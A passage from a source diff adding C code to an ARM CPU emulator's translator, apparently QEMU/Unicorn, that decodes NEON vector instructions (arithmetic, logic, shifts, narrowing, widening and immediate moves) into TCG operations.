tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); + } + break; + case NEON_3R_VADD_VSUB: + if (u) { + tcg_gen_sub_i64(tcg_ctx, CPU_V001); + } else { + tcg_gen_add_i64(tcg_ctx, CPU_V001); + } + break; + default: + abort(); + } + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); + } + return 0; + } + pairwise = 0; + switch (op) { + case NEON_3R_VSHL: + 
case NEON_3R_VQSHL: + case NEON_3R_VRSHL: + case NEON_3R_VQRSHL: + { + int rtmp; + /* Shift instruction operands are reversed. */ + rtmp = rn; + rn = rm; + rm = rtmp; + } + break; + case NEON_3R_VPADD: + if (u) { + return 1; + } + /* Fall through */ + case NEON_3R_VPMAX: + case NEON_3R_VPMIN: + pairwise = 1; + break; + case NEON_3R_FLOAT_ARITH: + pairwise = (u && size < 2); /* if VPADD (float) */ + break; + case NEON_3R_FLOAT_MINMAX: + pairwise = u; /* if VPMIN/VPMAX (float) */ + break; + case NEON_3R_FLOAT_CMP: + if (!u && size) { + /* no encoding for U=0 C=1x */ + return 1; + } + break; + case NEON_3R_FLOAT_ACMP: + if (!u) { + return 1; + } + break; + case NEON_3R_FLOAT_MISC: + /* VMAXNM/VMINNM in ARMv8 */ + if (u && !arm_dc_feature(s, ARM_FEATURE_V8)) { + return 1; + } + break; + case NEON_3R_VMUL: + if (u && (size != 0)) { + /* UNDEF on invalid size for polynomial subcase */ + return 1; + } + break; + case NEON_3R_VFM: + if (!arm_dc_feature(s, ARM_FEATURE_VFP4) || u) { + return 1; + } + break; + default: + break; + } + + if (pairwise && q) { + /* All the pairwise insns UNDEF if Q is set */ + return 1; + } + + for (pass = 0; pass < (q ? 4 : 2); pass++) { + + if (pairwise) { + /* Pairwise. */ + if (pass < 1) { + tmp = neon_load_reg(tcg_ctx, rn, 0); + tmp2 = neon_load_reg(tcg_ctx, rn, 1); + } else { + tmp = neon_load_reg(tcg_ctx, rm, 0); + tmp2 = neon_load_reg(tcg_ctx, rm, 1); + } + } else { + /* Elementwise. */ + tmp = neon_load_reg(tcg_ctx, rn, pass); + tmp2 = neon_load_reg(tcg_ctx, rm, pass); + } + switch (op) { + case NEON_3R_VHADD: + GEN_NEON_INTEGER_OP(hadd); + break; + case NEON_3R_VQADD: + GEN_NEON_INTEGER_OP_ENV(qadd); + break; + case NEON_3R_VRHADD: + GEN_NEON_INTEGER_OP(rhadd); + break; + case NEON_3R_LOGIC: /* Logic ops. 
*/ + switch ((u << 2) | size) { + case 0: /* VAND */ + tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); + break; + case 1: /* BIC */ + tcg_gen_andc_i32(tcg_ctx, tmp, tmp, tmp2); + break; + case 2: /* VORR */ + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + break; + case 3: /* VORN */ + tcg_gen_orc_i32(tcg_ctx, tmp, tmp, tmp2); + break; + case 4: /* VEOR */ + tcg_gen_xor_i32(tcg_ctx, tmp, tmp, tmp2); + break; + case 5: /* VBSL */ + tmp3 = neon_load_reg(tcg_ctx, rd, pass); + gen_neon_bsl(s, tmp, tmp, tmp2, tmp3); + tcg_temp_free_i32(tcg_ctx, tmp3); + break; + case 6: /* VBIT */ + tmp3 = neon_load_reg(tcg_ctx, rd, pass); + gen_neon_bsl(s, tmp, tmp, tmp3, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp3); + break; + case 7: /* VBIF */ + tmp3 = neon_load_reg(tcg_ctx, rd, pass); + gen_neon_bsl(s, tmp, tmp3, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp3); + break; + } + break; + case NEON_3R_VHSUB: + GEN_NEON_INTEGER_OP(hsub); + break; + case NEON_3R_VQSUB: + GEN_NEON_INTEGER_OP_ENV(qsub); + break; + case NEON_3R_VCGT: + GEN_NEON_INTEGER_OP(cgt); + break; + case NEON_3R_VCGE: + GEN_NEON_INTEGER_OP(cge); + break; + case NEON_3R_VSHL: + GEN_NEON_INTEGER_OP(shl); + break; + case NEON_3R_VQSHL: + GEN_NEON_INTEGER_OP_ENV(qshl); + break; + case NEON_3R_VRSHL: + GEN_NEON_INTEGER_OP(rshl); + break; + case NEON_3R_VQRSHL: + GEN_NEON_INTEGER_OP_ENV(qrshl); + break; + case NEON_3R_VMAX: + GEN_NEON_INTEGER_OP(max); + break; + case NEON_3R_VMIN: + GEN_NEON_INTEGER_OP(min); + break; + case NEON_3R_VABD: + GEN_NEON_INTEGER_OP(abd); + break; + case NEON_3R_VABA: + GEN_NEON_INTEGER_OP(abd); + tcg_temp_free_i32(tcg_ctx, tmp2); + tmp2 = neon_load_reg(tcg_ctx, rd, pass); + gen_neon_add(s, size, tmp, tmp2); + break; + case NEON_3R_VADD_VSUB: + if (!u) { /* VADD */ + gen_neon_add(s, size, tmp, tmp2); + } else { /* VSUB */ + switch (size) { + case 0: gen_helper_neon_sub_u8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_sub_u16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: tcg_gen_sub_i32(tcg_ctx, tmp, 
tmp, tmp2); break; + default: abort(); + } + } + break; + case NEON_3R_VTST_VCEQ: + if (!u) { /* VTST */ + switch (size) { + case 0: gen_helper_neon_tst_u8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_tst_u16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: gen_helper_neon_tst_u32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + } else { /* VCEQ */ + switch (size) { + case 0: gen_helper_neon_ceq_u8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_ceq_u16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: gen_helper_neon_ceq_u32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + } + break; + case NEON_3R_VML: /* VMLA, VMLAL, VMLS,VMLSL */ + switch (size) { + case 0: gen_helper_neon_mul_u8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_mul_u16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: tcg_gen_mul_i32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + tmp2 = neon_load_reg(tcg_ctx, rd, pass); + if (u) { /* VMLS */ + gen_neon_rsb(s, size, tmp, tmp2); + } else { /* VMLA */ + gen_neon_add(s, size, tmp, tmp2); + } + break; + case NEON_3R_VMUL: + if (u) { /* polynomial */ + gen_helper_neon_mul_p8(tcg_ctx, tmp, tmp, tmp2); + } else { /* Integer */ + switch (size) { + case 0: gen_helper_neon_mul_u8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_mul_u16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: tcg_gen_mul_i32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + } + break; + case NEON_3R_VPMAX: + GEN_NEON_INTEGER_OP(pmax); + break; + case NEON_3R_VPMIN: + GEN_NEON_INTEGER_OP(pmin); + break; + case NEON_3R_VQDMULH_VQRDMULH: /* Multiply high. 
*/ + if (!u) { /* VQDMULH */ + switch (size) { + case 1: + gen_helper_neon_qdmulh_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + break; + case 2: + gen_helper_neon_qdmulh_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + break; + default: abort(); + } + } else { /* VQRDMULH */ + switch (size) { + case 1: + gen_helper_neon_qrdmulh_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + break; + case 2: + gen_helper_neon_qrdmulh_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + break; + default: abort(); + } + } + break; + case NEON_3R_VPADD: + switch (size) { + case 0: gen_helper_neon_padd_u8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_padd_u16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + break; + case NEON_3R_FLOAT_ARITH: /* Floating point arithmetic. */ + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + switch ((u << 2) | size) { + case 0: /* VADD */ + case 4: /* VPADD */ + gen_helper_vfp_adds(tcg_ctx, tmp, tmp, tmp2, fpstatus); + break; + case 2: /* VSUB */ + gen_helper_vfp_subs(tcg_ctx, tmp, tmp, tmp2, fpstatus); + break; + case 6: /* VABD */ + gen_helper_neon_abd_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); + break; + default: + abort(); + } + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_3R_FLOAT_MULTIPLY: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + gen_helper_vfp_muls(tcg_ctx, tmp, tmp, tmp2, fpstatus); + if (!u) { + tcg_temp_free_i32(tcg_ctx, tmp2); + tmp2 = neon_load_reg(tcg_ctx, rd, pass); + if (size == 0) { + gen_helper_vfp_adds(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } else { + gen_helper_vfp_subs(tcg_ctx, tmp, tmp2, tmp, fpstatus); + } + } + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_3R_FLOAT_CMP: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + if (!u) { + gen_helper_neon_ceq_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } else { + if (size == 0) { + gen_helper_neon_cge_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } else { + 
gen_helper_neon_cgt_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } + } + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_3R_FLOAT_ACMP: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + if (size == 0) { + gen_helper_neon_acge_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } else { + gen_helper_neon_acgt_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_3R_FLOAT_MINMAX: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + if (size == 0) { + gen_helper_vfp_maxs(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } else { + gen_helper_vfp_mins(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_3R_FLOAT_MISC: + if (u) { + /* VMAXNM/VMINNM */ + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + if (size == 0) { + gen_helper_vfp_maxnums(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } else { + gen_helper_vfp_minnums(tcg_ctx, tmp, tmp, tmp2, fpstatus); + } + tcg_temp_free_ptr(tcg_ctx, fpstatus); + } else { + if (size == 0) { + gen_helper_recps_f32(tcg_ctx, tmp, tmp, tmp2, tcg_ctx->cpu_env); + } else { + gen_helper_rsqrts_f32(tcg_ctx, tmp, tmp, tmp2, tcg_ctx->cpu_env); + } + } + break; + case NEON_3R_VFM: + { + /* VFMA, VFMS: fused multiply-add */ + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + TCGv_i32 tmp3 = neon_load_reg(tcg_ctx, rd, pass); + if (size) { + /* VFMS */ + gen_helper_vfp_negs(tcg_ctx, tmp, tmp); + } + gen_helper_vfp_muladds(tcg_ctx, tmp, tmp, tmp2, tmp3, fpstatus); + tcg_temp_free_i32(tcg_ctx, tmp3); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + default: + abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + + /* Save the result. For elementwise operations we can put it + straight into the destination register. For pairwise operations + we have to be careful to avoid clobbering the source operands. 
*/ + if (pairwise && rd == rm) { + neon_store_scratch(tcg_ctx, pass, tmp); + } else { + neon_store_reg(tcg_ctx, rd, pass, tmp); + } + + } /* for pass */ + if (pairwise && rd == rm) { + for (pass = 0; pass < (q ? 4 : 2); pass++) { + tmp = neon_load_scratch(tcg_ctx, pass); + neon_store_reg(tcg_ctx, rd, pass, tmp); + } + } + /* End of 3 register same size operations. */ + } else if (insn & (1 << 4)) { + if ((insn & 0x00380080) != 0) { + /* Two registers and shift. */ + op = (insn >> 8) & 0xf; + if (insn & (1 << 7)) { + /* 64-bit shift. */ + if (op > 7) { + return 1; + } + size = 3; + } else { + size = 2; + while ((insn & (1 << (size + 19))) == 0) + size--; + } + shift = (insn >> 16) & ((1 << (3 + size)) - 1); + /* To avoid excessive duplication of ops we implement shift + by immediate using the variable shift operations. */ + if (op < 8) { + /* Shift by immediate: + VSHR, VSRA, VRSHR, VRSRA, VSRI, VSHL, VQSHL, VQSHLU. */ + if (q && ((rd | rm) & 1)) { + return 1; + } + if (!u && (op == 4 || op == 6)) { + return 1; + } + /* Right shifts are encoded as N - shift, where N is the + element size in bits. */ + if (op <= 4) + shift = shift - (1 << (size + 3)); + if (size == 3) { + count = q + 1; + } else { + count = q ? 
4: 2; + } + switch (size) { + case 0: + imm = (uint8_t) shift; + imm |= imm << 8; + imm |= imm << 16; + break; + case 1: + imm = (uint16_t) shift; + imm |= imm << 16; + break; + case 2: + case 3: + imm = shift; + break; + default: + abort(); + } + + for (pass = 0; pass < count; pass++) { + if (size == 3) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rm + pass); + tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_V1, imm); + switch (op) { + case 0: /* VSHR */ + case 1: /* VSRA */ + if (u) + gen_helper_neon_shl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + else + gen_helper_neon_shl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + break; + case 2: /* VRSHR */ + case 3: /* VRSRA */ + if (u) + gen_helper_neon_rshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + else + gen_helper_neon_rshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + break; + case 4: /* VSRI */ + case 5: /* VSHL, VSLI */ + gen_helper_neon_shl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + break; + case 6: /* VQSHLU */ + gen_helper_neon_qshlu_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + break; + case 7: /* VQSHL */ + if (u) { + gen_helper_neon_qshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + } else { + gen_helper_neon_qshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + } + break; + } + if (op == 1 || op == 3) { + /* Accumulate. 
*/ + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + pass); + tcg_gen_add_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + } else if (op == 4 || (op == 5 && u)) { + /* Insert */ + uint64_t mask; + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rd + pass); + if (shift < -63 || shift > 63) { + mask = 0; + } else { + if (op == 4) { + mask = 0xffffffffffffffffull >> -shift; + } else { + mask = 0xffffffffffffffffull << shift; + } + } + tcg_gen_andi_i64(tcg_ctx, tcg_ctx->cpu_V1, tcg_ctx->cpu_V1, ~mask); + tcg_gen_or_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + } + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); + } else { /* size < 3 */ + /* Operands in T0 and T1. */ + tmp = neon_load_reg(tcg_ctx, rm, pass); + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp2, imm); + switch (op) { + case 0: /* VSHR */ + case 1: /* VSRA */ + GEN_NEON_INTEGER_OP(shl); + break; + case 2: /* VRSHR */ + case 3: /* VRSRA */ + GEN_NEON_INTEGER_OP(rshl); + break; + case 4: /* VSRI */ + case 5: /* VSHL, VSLI */ + switch (size) { + case 0: gen_helper_neon_shl_u8(tcg_ctx, tmp, tmp, tmp2); break; + case 1: gen_helper_neon_shl_u16(tcg_ctx, tmp, tmp, tmp2); break; + case 2: gen_helper_neon_shl_u32(tcg_ctx, tmp, tmp, tmp2); break; + default: abort(); + } + break; + case 6: /* VQSHLU */ + switch (size) { + case 0: + gen_helper_neon_qshlu_s8(tcg_ctx, tmp, tcg_ctx->cpu_env, + tmp, tmp2); + break; + case 1: + gen_helper_neon_qshlu_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, + tmp, tmp2); + break; + case 2: + gen_helper_neon_qshlu_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, + tmp, tmp2); + break; + default: + abort(); + } + break; + case 7: /* VQSHL */ + GEN_NEON_INTEGER_OP_ENV(qshl); + break; + } + tcg_temp_free_i32(tcg_ctx, tmp2); + + if (op == 1 || op == 3) { + /* Accumulate. 
*/ + tmp2 = neon_load_reg(tcg_ctx, rd, pass); + gen_neon_add(s, size, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } else if (op == 4 || (op == 5 && u)) { + /* Insert */ + switch (size) { + case 0: + if (op == 4) + mask = 0xff >> -shift; + else + mask = (uint8_t)(0xff << shift); + mask |= mask << 8; + mask |= mask << 16; + break; + case 1: + if (op == 4) + mask = 0xffff >> -shift; + else + mask = (uint16_t)(0xffff << shift); + mask |= mask << 16; + break; + case 2: + if (shift < -31 || shift > 31) { + mask = 0; + } else { + if (op == 4) + mask = 0xffffffffu >> -shift; + else + mask = 0xffffffffu << shift; + } + break; + default: + abort(); + } + tmp2 = neon_load_reg(tcg_ctx, rd, pass); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, mask); + tcg_gen_andi_i32(tcg_ctx, tmp2, tmp2, ~mask); + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + neon_store_reg(tcg_ctx, rd, pass, tmp); + } + } /* for pass */ + } else if (op < 10) { + /* Shift by immediate and narrow: + VSHRN, VRSHRN, VQSHRN, VQRSHRN. */ + int input_unsigned = (op == 8) ? 
!u : u; + if (rm & 1) { + return 1; + } + shift = shift - (1 << (size + 3)); + size++; + if (size == 3) { + tmp64 = tcg_const_i64(tcg_ctx, shift); + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rm); + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm + 1); + for (pass = 0; pass < 2; pass++) { + TCGv_i64 in; + if (pass == 0) { + in = tcg_ctx->cpu_V0; + } else { + in = tcg_ctx->cpu_V1; + } + if (q) { + if (input_unsigned) { + gen_helper_neon_rshl_u64(tcg_ctx, tcg_ctx->cpu_V0, in, tmp64); + } else { + gen_helper_neon_rshl_s64(tcg_ctx, tcg_ctx->cpu_V0, in, tmp64); + } + } else { + if (input_unsigned) { + gen_helper_neon_shl_u64(tcg_ctx, tcg_ctx->cpu_V0, in, tmp64); + } else { + gen_helper_neon_shl_s64(tcg_ctx, tcg_ctx->cpu_V0, in, tmp64); + } + } + tmp = tcg_temp_new_i32(tcg_ctx); + gen_neon_narrow_op(s, op == 8, u, size - 1, tmp, tcg_ctx->cpu_V0); + neon_store_reg(tcg_ctx, rd, pass, tmp); + } /* for pass */ + tcg_temp_free_i64(tcg_ctx, tmp64); + } else { + if (size == 1) { + imm = (uint16_t)shift; + imm |= imm << 16; + } else { + /* size == 2 */ + imm = (uint32_t)shift; + } + tmp2 = tcg_const_i32(tcg_ctx, imm); + tmp4 = neon_load_reg(tcg_ctx, rm + 1, 0); + tmp5 = neon_load_reg(tcg_ctx, rm + 1, 1); + for (pass = 0; pass < 2; pass++) { + if (pass == 0) { + tmp = neon_load_reg(tcg_ctx, rm, 0); + } else { + tmp = tmp4; + } + gen_neon_shift_narrow(s, size, tmp, tmp2, q, + input_unsigned); + if (pass == 0) { + tmp3 = neon_load_reg(tcg_ctx, rm, 1); + } else { + tmp3 = tmp5; + } + gen_neon_shift_narrow(s, size, tmp3, tmp2, q, + input_unsigned); + tcg_gen_concat_i32_i64(tcg_ctx, tcg_ctx->cpu_V0, tmp, tmp3); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, tmp3); + tmp = tcg_temp_new_i32(tcg_ctx); + gen_neon_narrow_op(s, op == 8, u, size - 1, tmp, tcg_ctx->cpu_V0); + neon_store_reg(tcg_ctx, rd, pass, tmp); + } /* for pass */ + tcg_temp_free_i32(tcg_ctx, tmp2); + } + } else if (op == 10) { + /* VSHLL, VMOVL */ + if (q || (rd & 1)) { + return 1; + } + tmp = 
neon_load_reg(tcg_ctx, rm, 0); + tmp2 = neon_load_reg(tcg_ctx, rm, 1); + for (pass = 0; pass < 2; pass++) { + if (pass == 1) + tmp = tmp2; + + gen_neon_widen(s, tcg_ctx->cpu_V0, tmp, size, u); + + if (shift != 0) { + /* The shift is less than the width of the source + type, so we can just shift the whole register. */ + tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, shift); + /* Widen the result of shift: we need to clear + * the potential overflow bits resulting from + * left bits of the narrow input appearing as + * right bits of left the neighbour narrow + * input. */ + if (size < 2 || !u) { + uint64_t imm64; + if (size == 0) { + imm = (0xffu >> (8 - shift)); + imm |= imm << 16; + } else if (size == 1) { + imm = 0xffff >> (16 - shift); + } else { + /* size == 2 */ + imm = 0xffffffff >> (32 - shift); + } + if (size < 2) { + imm64 = imm | (((uint64_t)imm) << 32); + } else { + imm64 = imm; + } + tcg_gen_andi_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, ~imm64); + } + } + neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); + } + } else if (op >= 14) { + /* VCVT fixed-point. */ + if (!(insn & (1 << 21)) || (q && ((rd | rm) & 1))) { + return 1; + } + /* We have already masked out the must-be-1 top bit of imm6, + * hence this 32-shift where the ARM ARM has 64-imm6. + */ + shift = 32 - shift; + for (pass = 0; pass < (q ? 4 : 2); pass++) { + tcg_gen_ld_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rm, pass)); + if (!(op & 1)) { + if (u) + gen_vfp_ulto(s, 0, shift, 1); + else + gen_vfp_slto(s, 0, shift, 1); + } else { + if (u) + gen_vfp_toul(s, 0, shift, 1); + else + gen_vfp_tosl(s, 0, shift, 1); + } + tcg_gen_st_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, neon_reg_offset(rd, pass)); + } + } else { + return 1; + } + } else { /* (insn & 0x00380080) == 0 */ + int invert; + if (q && (rd & 1)) { + return 1; + } + + op = (insn >> 8) & 0xf; + /* One register and immediate. 
*/ + imm = (u << 7) | ((insn >> 12) & 0x70) | (insn & 0xf); + invert = (insn & (1 << 5)) != 0; + /* Note that op = 2,3,4,5,6,7,10,11,12,13 imm=0 is UNPREDICTABLE. + * We choose to not special-case this and will behave as if a + * valid constant encoding of 0 had been given. + */ + switch (op) { + case 0: case 1: + /* no-op */ + break; + case 2: case 3: + imm <<= 8; + break; + case 4: case 5: + imm <<= 16; + break; + case 6: case 7: + imm <<= 24; + break; + case 8: case 9: + imm |= imm << 16; + break; + case 10: case 11: + imm = (imm << 8) | (imm << 24); + break; + case 12: + imm = (imm << 8) | 0xff; + break; + case 13: + imm = (imm << 16) | 0xffff; + break; + case 14: + imm |= (imm << 8) | (imm << 16) | (imm << 24); + if (invert) + imm = ~imm; + break; + case 15: + if (invert) { + return 1; + } + imm = ((imm & 0x80) << 24) | ((imm & 0x3f) << 19) + | ((imm & 0x40) ? (0x1f << 25) : (1 << 30)); + break; + } + if (invert) + imm = ~imm; + + for (pass = 0; pass < (q ? 4 : 2); pass++) { + if (op & 1 && op < 12) { + tmp = neon_load_reg(tcg_ctx, rd, pass); + if (invert) { + /* The immediate value has already been inverted, so + BIC becomes AND. */ + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, imm); + } else { + tcg_gen_ori_i32(tcg_ctx, tmp, tmp, imm); + } + } else { + /* VMOV, VMVN. */ + tmp = tcg_temp_new_i32(tcg_ctx); + if (op == 14 && invert) { + int n; + uint32_t val; + val = 0; + for (n = 0; n < 4; n++) { + if (imm & (1 << (n + (pass & 1) * 4))) + val |= 0xffU << (n * 8); + } + tcg_gen_movi_i32(tcg_ctx, tmp, val); + } else { + tcg_gen_movi_i32(tcg_ctx, tmp, imm); + } + } + neon_store_reg(tcg_ctx, rd, pass, tmp); + } + } + } else { /* (insn & 0x00800010 == 0x00800000) */ + if (size != 3) { + op = (insn >> 8) & 0xf; + if ((insn & (1 << 6)) == 0) { + /* Three registers of different lengths. 
*/ + int src1_wide; + int src2_wide; + int prewiden; + /* undefreq: bit 0 : UNDEF if size == 0 + * bit 1 : UNDEF if size == 1 + * bit 2 : UNDEF if size == 2 + * bit 3 : UNDEF if U == 1 + * Note that [2:0] set implies 'always UNDEF' + */ + int undefreq; + /* prewiden, src1_wide, src2_wide, undefreq */ + static const int neon_3reg_wide[16][4] = { + {1, 0, 0, 0}, /* VADDL */ + {1, 1, 0, 0}, /* VADDW */ + {1, 0, 0, 0}, /* VSUBL */ + {1, 1, 0, 0}, /* VSUBW */ + {0, 1, 1, 0}, /* VADDHN */ + {0, 0, 0, 0}, /* VABAL */ + {0, 1, 1, 0}, /* VSUBHN */ + {0, 0, 0, 0}, /* VABDL */ + {0, 0, 0, 0}, /* VMLAL */ + {0, 0, 0, 9}, /* VQDMLAL */ + {0, 0, 0, 0}, /* VMLSL */ + {0, 0, 0, 9}, /* VQDMLSL */ + {0, 0, 0, 0}, /* Integer VMULL */ + {0, 0, 0, 1}, /* VQDMULL */ + {0, 0, 0, 0xa}, /* Polynomial VMULL */ + {0, 0, 0, 7}, /* Reserved: always UNDEF */ + }; + + prewiden = neon_3reg_wide[op][0]; + src1_wide = neon_3reg_wide[op][1]; + src2_wide = neon_3reg_wide[op][2]; + undefreq = neon_3reg_wide[op][3]; + + if ((undefreq & (1 << size)) || + ((undefreq & 8) && u)) { + return 1; + } + if ((src1_wide && (rn & 1)) || + (src2_wide && (rm & 1)) || + (!src2_wide && (rd & 1))) { + return 1; + } + + /* Handle VMULL.P64 (Polynomial 64x64 to 128 bit multiply) + * outside the loop below as it only performs a single pass. 
+ */ + if (op == 14 && size == 2) { + TCGv_i64 tcg_rn, tcg_rm, tcg_rd; + + if (!arm_dc_feature(s, ARM_FEATURE_V8_PMULL)) { + return 1; + } + tcg_rn = tcg_temp_new_i64(tcg_ctx); + tcg_rm = tcg_temp_new_i64(tcg_ctx); + tcg_rd = tcg_temp_new_i64(tcg_ctx); + neon_load_reg64(tcg_ctx, tcg_rn, rn); + neon_load_reg64(tcg_ctx, tcg_rm, rm); + gen_helper_neon_pmull_64_lo(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + neon_store_reg64(tcg_ctx, tcg_rd, rd); + gen_helper_neon_pmull_64_hi(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + neon_store_reg64(tcg_ctx, tcg_rd, rd + 1); + tcg_temp_free_i64(tcg_ctx, tcg_rn); + tcg_temp_free_i64(tcg_ctx, tcg_rm); + tcg_temp_free_i64(tcg_ctx, tcg_rd); + return 0; + } + + /* Avoid overlapping operands. Wide source operands are + always aligned so will never overlap with wide + destinations in problematic ways. */ + if (rd == rm && !src2_wide) { + tmp = neon_load_reg(tcg_ctx, rm, 1); + neon_store_scratch(tcg_ctx, 2, tmp); + } else if (rd == rn && !src1_wide) { + tmp = neon_load_reg(tcg_ctx, rn, 1); + neon_store_scratch(tcg_ctx, 2, tmp); + } + TCGV_UNUSED_I32(tmp3); + for (pass = 0; pass < 2; pass++) { + if (src1_wide) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn + pass); + TCGV_UNUSED_I32(tmp); + } else { + if (pass == 1 && rd == rn) { + tmp = neon_load_scratch(tcg_ctx, 2); + } else { + tmp = neon_load_reg(tcg_ctx, rn, pass); + } + if (prewiden) { + gen_neon_widen(s, tcg_ctx->cpu_V0, tmp, size, u); + } + } + if (src2_wide) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm + pass); + TCGV_UNUSED_I32(tmp2); + } else { + if (pass == 1 && rd == rm) { + tmp2 = neon_load_scratch(tcg_ctx, 2); + } else { + tmp2 = neon_load_reg(tcg_ctx, rm, pass); + } + if (prewiden) { + gen_neon_widen(s, tcg_ctx->cpu_V1, tmp2, size, u); + } + } + switch (op) { + case 0: case 1: case 4: /* VADDL, VADDW, VADDHN, VRADDHN */ + gen_neon_addl(s, size); + break; + case 2: case 3: case 6: /* VSUBL, VSUBW, VSUBHN, VRSUBHN */ + gen_neon_subl(s, size); + break; + case 5: case 7: /* VABAL, VABDL */ 
